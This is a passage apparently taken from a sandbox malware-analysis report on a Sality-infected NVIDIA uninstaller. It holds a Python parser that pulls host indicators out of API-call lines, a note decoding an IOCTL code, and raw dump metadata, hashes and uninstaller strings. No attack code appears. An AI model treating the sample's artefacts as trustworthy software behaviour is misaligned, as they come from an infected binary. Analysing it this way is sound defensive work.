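• DeviceIoControl.KERNEL32(00000000,00041018,00000000,00000000,?,00000008,?,00000000), ref: 00407D21
• CloseHandle.KERNEL32(00000000), ref: 00407D2A
"""

# One report line: optional "Part of subcall function XXXXXXXX:", then
# Api.MODULE, an optional "(args)" list, and the call-site address after "ref:".
API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Reference data from the Windows SDK headers (winioctl.h / ntddscsi.h).
KNOWN_IOCTLS = {
    0x00041018: "IOCTL_SCSI_GET_ADDRESS",
    0x002D1080: "IOCTL_STORAGE_GET_DEVICE_NUMBER",
    0x00070000: "IOCTL_DISK_GET_DRIVE_GEOMETRY",
}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT", 2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
HIVES = {0x80000000: "HKCR", 0x80000001: "HKCU", 0x80000002: "HKLM", 0x80000003: "HKU"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                 # address of the call instruction
    subcall: Optional[int]   # enclosing function when reported as "Part of subcall"


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the report's API bullet lines into structured records; skips non-matching lines."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def _as_int(arg: str) -> Optional[int]:
    """Numeric report arguments are 8 hex digits; anything else is a string or '?'."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_ctl_code(code: int) -> Dict[str, int]:
    """Split a CTL_CODE(DeviceType, Function, Method, Access) value into its fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }


def ioctl_name(code: int) -> str:
    """Known name if we have one, otherwise a decoded description so the code is still readable."""
    if code in KNOWN_IOCTLS:
        return KNOWN_IOCTLS[code]
    d = decode_ctl_code(code)
    return (f"unknown IOCTL 0x{code:08X} (device_type=0x{d['device_type']:X}, "
            f"function=0x{d['function']:X}, {METHODS[d['method']]})")


def summarize(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Collect host-based indicators from the argument positions the report preserves."""
    out: Dict[str, List[str]] = {"mutexes": [], "file_mappings": [], "registry_keys": [], "ioctls": []}
    for c in calls:
        if c.api.startswith("CreateMutex") and len(c.args) >= 3:
            out["mutexes"].append(c.args[2])                      # lpName
        elif c.api.startswith("CreateFileMapping") and len(c.args) >= 6:
            out["file_mappings"].append(c.args[5])                # lpName
        elif c.api.startswith("RegOpenKeyEx") and len(c.args) >= 2:
            hive = HIVES.get(_as_int(c.args[0]) or -1, c.args[0])  # hKey -> hive name
            out["registry_keys"].append(f"{hive}\\{c.args[1]}")
        elif c.api == "DeviceIoControl" and len(c.args) >= 2:
            code = _as_int(c.args[1])                             # dwIoControlCode
            if code is not None:
                out["ioctls"].append(ioctl_name(code))
    return out


if __name__ == "__main__":
    for key, values in summarize(parse_api_lines(SAMPLE_LINES)).items():
        print(f"{key}: {values}")
```

Decoding 00041018 gives device type 0x4 (FILE_DEVICE_CONTROLLER, which is IOCTL_SCSI_BASE), function 0x406, METHOD_BUFFERED and FILE_ANY_ACCESS, the SDK definition of IOCTL_SCSI_GET_ADDRESS; the 8-byte output buffer in the call matches sizeof(SCSI_ADDRESS), and the CreateFileA before it opens the device with zero desired access and OPEN_EXISTING, which is enough for this query. All of that agrees with the entry's own string ID, GetDriveSCSIAddress, so this routine belongs to the NVIDIA uninstaller host rather than to the infection. Mutex and mapping names recovered the same way (Global\NVInstallerLogFile, NVInstallerLogSharedMemory) are likewise host-program artifacts and should not be turned into Sality detections.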
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 27350560abe260e57fde0ad58594dca5c90defaaa907b3b186303e3d46297d56
                                  • Instruction ID: 0579c25e085e1512329c1ddb5f3af8ffe13fa67cb51483bf55b12c7ce0f1ae6d
                                  • Opcode Fuzzy Hash: 27350560abe260e57fde0ad58594dca5c90defaaa907b3b186303e3d46297d56
                                  • Instruction Fuzzy Hash: 0B223B75E2024A8FDB14CFA4C891BEDFBB2FF48305F548269D9156B789C335A852CB50
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00016A4F), ref: 00416A91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 03d51526594cf31ddfcdaad92c3bc03b361f09153d1a434295373f872738f46a
                                  • Instruction ID: 1a39cd3ecfb8144f4f1783dd73fdd0f7c678ae64291d6b6cf59011757d761d4c
                                  • Opcode Fuzzy Hash: 03d51526594cf31ddfcdaad92c3bc03b361f09153d1a434295373f872738f46a
                                  • Instruction Fuzzy Hash: DC9022B02000802A020003308C2E08020808E8C282303A0202800C0000CB2080800008
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4c4ac0512ad029f24f0d8f95b3687ce4f89bf976eca3f9a8a5502af46803cde
                                  • Instruction ID: 6ef4158a4c278fbbeb488f0612d98be58833bb882bcaff3ed1cb5ef879c16298
                                  • Opcode Fuzzy Hash: f4c4ac0512ad029f24f0d8f95b3687ce4f89bf976eca3f9a8a5502af46803cde
                                  • Instruction Fuzzy Hash: 76C19837B853280BD70C48EDDCE13A5AA4BD7D5321F1B833E9A568B7C5DEAC490602C4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff9770ac83485ea373c1331299549a21d82c2f29004a4750015414cdbe9335bf
                                  • Instruction ID: a511684ab90478b3ec4b6b31deb4d6a62a5a4267bb2a1763fb07238f9614424d
                                  • Opcode Fuzzy Hash: ff9770ac83485ea373c1331299549a21d82c2f29004a4750015414cdbe9335bf
                                  • Instruction Fuzzy Hash: 2BA18837B853280BE70848ED9DE13A5AA8BD7D5720F1A833E9A558B7C9CEBD450601C4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb9f2f5726a5360b4111c8c79dc817ddb16868841e4e35c65c081fa033cea37f
                                  • Instruction ID: 9881b5ea8813afef01d938b652f4e8e4e1628a8aeded3cb36fdf36d4e5d7b6db
                                  • Opcode Fuzzy Hash: eb9f2f5726a5360b4111c8c79dc817ddb16868841e4e35c65c081fa033cea37f
                                  • Instruction Fuzzy Hash: F4A19737B853280BE7094CED9CE13A5AA87D7D9720F5A833E8A558B7C5CEBD490642C4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e37dc2b2704ba8a31452895283176b6159364b9a0ae5c63ec3f4e96527e58849
                                  • Instruction ID: 06d2b64f4ee7a272c15912ce310d05e70aa8f2263e2638535416a26493e40656
                                  • Opcode Fuzzy Hash: e37dc2b2704ba8a31452895283176b6159364b9a0ae5c63ec3f4e96527e58849
                                  • Instruction Fuzzy Hash: C6815E74A146498FDB15CFA8C890BAEFBF2EF4E314F5482A8D465AF794C3356851CB40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                   • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cba396393552e373ef23297fca1e4430dd6d130cf8771c7690be50d40411dcfd
                                  • Instruction ID: 73c49a68e319b7694202c91f2e2a43c1633c7febf1b068626e12caca73397b87
                                  • Opcode Fuzzy Hash: cba396393552e373ef23297fca1e4430dd6d130cf8771c7690be50d40411dcfd
                                  • Instruction Fuzzy Hash: BD715E70E0414A8BDB08CF99C5A17BFBBB6EF89304F18C069D955EB389D6349912CF94
                                  APIs
                                    • Part of subcall function 00403260: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040329C
                                    • Part of subcall function 00403260: GetProcAddress.KERNEL32(00000000), ref: 004032A3
                                    • Part of subcall function 00403260: GetCurrentProcess.KERNEL32(?), ref: 004032BA
                                    • Part of subcall function 00403260: _sprintf.LIBCMT ref: 004032DF
                                    • Part of subcall function 00403260: MessageBoxA.USER32(?,?,Fatal Error,00000010), ref: 004032F7
                                  • LoadStringA.USER32(?,00000001,0042ACB8,00000080), ref: 0040AEB2
                                  Strings
                                  • Runs the given file and deletes it. It also removes the given key from Add/Remove Program list, xrefs: 0040AA2A
                                  • CheckPath, xrefs: 0040AA1E
                                  • DelBootQuiet, xrefs: 0040AAC0
                                  • Given an appname enumerates all the running app and kills its process if it is running, xrefs: 0040AD1E
                                  • GetReg, xrefs: 0040AB7D
                                  • uninstalls the given service name, xrefs: 0040AB89, 0040ABA4
                                  • DelReg, xrefs: 0040AB2C
                                  • Void, xrefs: 0040ACD2
                                  • Installs the given driver for any device matched using UpdateDriverForPlugAndPlayDevices for Win200 and above and InstallDriverEx for Win95 and Win98, xrefs: 0040ABF5
                                  • CreateShortcut, xrefs: 0040AD63
                                  • Removes the specified string from the original string of words if found and saves the result in new variable, xrefs: 0040AACC
                                  • Adds the given name to environment variables and sets its value, xrefs: 0040ACE8
                                  • Enumerates all keys matching the given regpath and when matched enumarates all names under that key then calls the given command {Current Reg name} and {Current Reg value} are set when the given command is executed, xrefs: 0040AC97
                                  • UninstallService, xrefs: 0040ABB3
                                  • DelBoot, xrefs: 0040AA8A
                                  • Copies a file from the given source to given dest, xrefs: 0040AAE7
                                  • FindOEMInf, xrefs: 0040A9EE
                                  • AddUninstall, xrefs: 0040AA6F
                                  • VWh4A, xrefs: 0040AD43
                                  • Enumerates all keys matching the given regpath and when matched calls the given command {Current Reg Key} is set then the given command is executed, xrefs: 0040ACB2
                                  • Hardware ID}, {InfFullPath, xrefs: 0040ABDF, 0040ABFA, 0040AC15
                                  • VWhA, xrefs: 0040AA19
                                  • DelRegE, xrefs: 0040AB47
                                  • \NVUninst.nvu, xrefs: 0040AE6D
                                  • CreateDevice, xrefs: 0040AC1F
                                  • Service Name}, {StopCode, xrefs: 0040AB8E
                                  • RemoveDevice, xrefs: 0040ABCE
                                  • Srcfile,DstFile, xrefs: 0040AAEC, 0040AB07
                                  • DisplayControlPanel, xrefs: 0040ADEA
                                  • Enum Type} , {Hardware ID}, {Device type, xrefs: 0040ABC4
                                  • InstallDriverEx, xrefs: 0040ABE9
                                  • RmString, xrefs: 0040AADB
                                  • Displays message about Display Control Panel uninstall., xrefs: 0040ADDB
                                  • Returns TRUE if path exists., xrefs: 0040AA0F
                                  • GUID,{StrPattern1};{StrPattern2};...., xrefs: 0040AC81
                                  • Remove any device matched with the given description from the system using setupdi calls.Enum can be (PCI, EISA, etc), HWID usually is VEN_10DE and device type can be DISPLAY,HDC,MEDIA,NET,SYSTEM, xrefs: 0040ABBF
                                  • RegPathToEnumatrate} , {Command, xrefs: 0040AC9C, 0040ACB7
                                  • SendMessage, xrefs: 0040AD48
                                  • Install ITB Driver, xrefs: 0040AE2B
                                  • Registry pattern matching string\Name[=value], xrefs: 0040AB58
                                  • Path to files to be deleted on reboot without reboot request, xrefs: 0040AAB6
                                  • Pass in the GUID of the inf and the string patterns of the reg names to be deleted. It will remove all the reg names corresponding to the str pattern under the GUID subkeys (i.e. 0000,0001..... except in Properties), xrefs: 0040AC7C
                                  • EnumRegCmd, xrefs: 0040ACC1
                                  • Variable Name = Full Path to Inf, xrefs: 0040AC30
                                  • Variable} = Local Path, xrefs: 0040AA14
                                  • Variable} = SrcStr(-)"RmStr", xrefs: 0040AAD1
                                  • Uninstalls the given product from add remove programs.If it detects uninstall as its nvu it uses internal uninstall command otherwise calls the appropriate uninstall command., xrefs: 0040AA45
                                  • u:@, xrefs: 0040A9B9, 0040AECE
                                  • Uninstall, xrefs: 0040AA39
                                  • Variable} = {regkeypath\Name, xrefs: 0040AB73
                                  • QVh,A, xrefs: 0040ABAE
                                  • ClassSweep, xrefs: 0040AC8B
                                  • NVU File}, {Uninstall Reg key, xrefs: 0040AA2F
                                  • DeviceId},{Class},{Cmd, xrefs: 0040AD8F
                                  • DelIniIfMatched, xrefs: 0040AC70
                                  • Uninstall Display Reg key, xrefs: 0040AA4A
                                  • LnkFile,Title,ProgFile,ProgArgs,ProgWorkingDir, xrefs: 0040AD59
                                  • KillApp, xrefs: 0040AD2D
                                  • Inffile} , {Section} , {Name} , {Value} , {[,...], xrefs: 0040AC66
                                  • It uses the first char of the path as drive letter and assigns the port number of that to the given variable name., xrefs: 0040AD6F
                                  • Master Data File, xrefs: 0040AE93
                                  • Service Name, xrefs: 0040ABA9
                                  • Displays the GUI to uninstall whatever user chooses, xrefs: 0040AD03
                                  • Returns TRUE if RAID exists., xrefs: 0040ADC0
                                  • Adds Display name as the title to in Add/Remove programs list and copies uninstall binary and script file to windows system directory, xrefs: 0040AA60
                                  • it searches in all inf files under sysdir\inf\OEM*.inf and if it finds a match with given parameters it deletes it on reboot, xrefs: 0040AC61
                                  • Set NVUninst_RegKey={UninstRegkey}\NVIDIA Drivers, xrefs: 0040AE02
                                  • GetInfGUID, xrefs: 0040AC3A
                                  • If it finds name under regkeypath copies its value to the given variable, othewise does nothing., xrefs: 0040AB6E
                                  • Name=Value, xrefs: 0040ACED
                                  • WildCard} , {Section} , {Name} , {Value} , {[...], xrefs: 0040AC4B
                                  • InstallDriver, xrefs: 0040AC04
                                  • Registry pattern matching string, xrefs: 0040AB22, 0040AB3D
                                  • StopService, xrefs: 0040AB98
                                  • GetFolderPath, xrefs: 0040ADB4
                                  • CheckRAID, xrefs: 0040ADCF
                                  • SetEnv, xrefs: 0040ACF7
                                  • DelOemInfs, xrefs: 0040AC55
                                  • It enumerats all the devices present on the system if any device has {DeviceID} and is from the given {Class} then variable {Current Device} is set to that device ID and the given command gets executed., xrefs: 0040AD8A
                                  • Deletes regkey(s) matching the given registry key, xrefs: 0040AB1D
                                  • Variable} = {path, xrefs: 0040AD74
                                  • Put the given file for delete in the next reboot.If the file exists it will ask user for the reboot when program ends., xrefs: 0040AA7B, 0040AAB1
                                  • Deletes the given file if it exists, It also deletes a directory if it is empty. If the file is locked it will set the system to delete the file upon reboot, xrefs: 0040AA96
                                  • it searches in all inf files under sysdir\inf\[Wildcard and OEM*.inf] and if it finds a match with given parameters it deletes it on reboot, xrefs: 0040AC46
                                  • Uninstall File} , {Display Name, xrefs: 0040AA65
                                  • UnInstallEx, xrefs: 0040AA54
                                  • Variable} , INF name, xrefs: 0040A9E4
                                  • GetDrivePort, xrefs: 0040AD7E
                                  • UninstallGUI, xrefs: 0040AD12
                                  • Sets the given variable to a string representing the inf's GUID, xrefs: 0040AC2B
                                  • SetReg, xrefs: 0040AB62
                                  • Copy, xrefs: 0040AAF6
                                  • Del, xrefs: 0040AAA5
                                  • Variable Name = FolderCode, xrefs: 0040ADAA
                                  • For all the matching registry paths, sets values if [=value] is present, creates subkeys otherwise, xrefs: 0040AB53
                                  • Set UninstRegKey=HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0040ADF6
                                  • Installs the given driver for any device matched with the given device ID from the system using setupdi calls., xrefs: 0040ABDA
                                  • AppName}, {Message, xrefs: 0040AD3E
                                  • AppName, xrefs: 0040AD23
                                  • Set UNINSTALL_TAG=UNINSTALL IN PROGRESS, xrefs: 0040AE1A
                                  • Path to files to be deleted on reboot, xrefs: 0040AA80
                                  • Copies a file from the given source to given dest only if source is a higher version., xrefs: 0040AB02
                                  • Only deletes regkey(s) matching the given registry key if they have no subkeys or values, xrefs: 0040AB38
                                  • Creates a shell link (shortcut), xrefs: 0040AD54
                                  • EnumDevices, xrefs: 0040AD99
                                  • Given an appname, sends its window a message, xrefs: 0040AD39
                                  • sysdir, xrefs: 0040AE37
                                  • This function first creates a device Installs the driver for this device using given inf. This function should work for all versions of Windows, xrefs: 0040AC10
                                  • Sets the given variable to the path of a special folder, identified by its CSIDL (check MSDN SHGetSpecialFolderPath Function), xrefs: 0040ADA5
                                  • Path to file to be deleted, xrefs: 0040AA9B
                                  • CopyV, xrefs: 0040AB11
                                  • This is a legacy command to maintain backward compatibility., xrefs: 0040ACCD
                                  • EnumRegNamesCmd, xrefs: 0040ACA6
                                  • Looks under the windows INF directory for additional NVIDIA display driver infs (oem*.inf). Returns TRUE if found., xrefs: 0040A9DF
                                  • UnifyUninst, xrefs: 0040ACDC
                                  • Set NVCompList_RegKey={NVUninst_RegKey}\SubComponents, xrefs: 0040AE0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AddressCurrentHandleLoadMessageModuleProcProcessString_sprintf
                                  • String ID: it searches in all inf files under sysdir\inf\[Wildcard and OEM*.inf] and if it finds a match with given parameters it deletes it on reboot$AddUninstall$Adds Display name as the title to in Add/Remove programs list and copies uninstall binary and script file to windows system directory$Adds the given name to environment variables and sets its value$AppName$AppName}, {Message$CheckPath$CheckRAID$ClassSweep$Copies a file from the given source to given dest$Copies a file from the given source to given dest only if source is a higher version.$Copy$CopyV$CreateDevice$CreateShortcut$Creates a shell link (shortcut)$Del$DelBoot$DelBootQuiet$DelIniIfMatched$DelOemInfs$DelReg$DelRegE$Deletes regkey(s) matching the given registry key$Deletes the given file if it exists, It also deletes a directory if it is empty. If the file is locked it will set the system to delete the file upon reboot$DeviceId},{Class},{Cmd$DisplayControlPanel$Displays message about Display Control Panel uninstall.$Displays the GUI to uninstall whatever user chooses$Enum Type} , {Hardware ID}, {Device type$EnumDevices$EnumRegCmd$EnumRegNamesCmd$Enumerates all keys matching the given regpath and when matched calls the given command {Current Reg Key} is set then the given command is executed$Enumerates all keys matching the given regpath and when matched enumarates all names under that key then calls the given command {Current Reg name} and {Current Reg value} are set when the given command is executed$FindOEMInf$For all the matching registry paths, sets values if [=value] is present, creates subkeys otherwise$GUID,{StrPattern1};{StrPattern2};....$GetDrivePort$GetFolderPath$GetInfGUID$GetReg$Given an appname enumerates all the running app and kills its process if it is running$Given an appname, sends its window a message$Hardware ID}, {InfFullPath$If it finds name under regkeypath copies its value to the given variable, othewise does nothing.$Inffile} , 
{Section} , {Name} , {Value} , {[,...]$Install ITB Driver$InstallDriver$InstallDriverEx$Installs the given driver for any device matched using UpdateDriverForPlugAndPlayDevices for Win200 and above and InstallDriverEx for Win95 and Win98$Installs the given driver for any device matched with the given device ID from the system using setupdi calls.$It enumerats all the devices present on the system if any device has {DeviceID} and is from the given {Class} then variable {Current Device} is set to that device ID and the given command gets executed.$It uses the first char of the path as drive letter and assigns the port number of that to the given variable name.$KillApp$LnkFile,Title,ProgFile,ProgArgs,ProgWorkingDir$Looks under the windows INF directory for additional NVIDIA display driver infs (oem*.inf). Returns TRUE if found.$Master Data File$NVU File}, {Uninstall Reg key$Name=Value$Only deletes regkey(s) matching the given registry key if they have no subkeys or values$Pass in the GUID of the inf and the string patterns of the reg names to be deleted. It will remove all the reg names corresponding to the str pattern under the GUID subkeys (i.e. 0000,0001..... except in Properties)$Path to file to be deleted$Path to files to be deleted on reboot$Path to files to be deleted on reboot without reboot request$Put the given file for delete in the next reboot.If the file exists it will ask user for the reboot when program ends.$QVh,A$RegPathToEnumatrate} , {Command$Registry pattern matching string$Registry pattern matching string\Name[=value]$Remove any device matched with the given description from the system using setupdi calls.Enum can be (PCI, EISA, etc), HWID usually is VEN_10DE and device type can be DISPLAY,HDC,MEDIA,NET,SYSTEM$RemoveDevice$Removes the specified string from the original string of words if found and saves the result in new variable$Returns TRUE if RAID exists.$Returns TRUE if path exists.$RmString$Runs the given file and deletes it. 
It also removes the given key from Add/Remove Program list$SendMessage$Service Name$Service Name}, {StopCode$Set NVCompList_RegKey={NVUninst_RegKey}\SubComponents$Set NVUninst_RegKey={UninstRegkey}\NVIDIA Drivers$Set UNINSTALL_TAG=UNINSTALL IN PROGRESS$Set UninstRegKey=HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall$SetEnv$SetReg$Sets the given variable to a string representing the inf's GUID$Sets the given variable to the path of a special folder, identified by its CSIDL (check MSDN SHGetSpecialFolderPath Function)$Srcfile,DstFile$StopService$This function first creates a device Installs the driver for this device using given inf. This function should work for all versions of Windows$This is a legacy command to maintain backward compatibility.$UnInstallEx$UnifyUninst$Uninstall$Uninstall Display Reg key$Uninstall File} , {Display Name$UninstallGUI$UninstallService$Uninstalls the given product from add remove programs.If it detects uninstall as its nvu it uses internal uninstall command otherwise calls the appropriate uninstall command.$VWh4A$VWhA$Variable Name = FolderCode$Variable Name = Full Path to Inf$Variable} , INF name$Variable} = Local Path$Variable} = SrcStr(-)"RmStr"$Variable} = {path$Variable} = {regkeypath\Name$Void$WildCard} , {Section} , {Name} , {Value} , {[...]$\NVUninst.nvu$it searches in all inf files under sysdir\inf\OEM*.inf and if it finds a match with given parameters it deletes it on reboot$sysdir$u:@$uninstalls the given service name
                                  APIs
                                  • _memset.LIBCMT ref: 00404AFC
                                  • _memset.LIBCMT ref: 00404B11
                                  • _memset.LIBCMT ref: 00404B2C
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
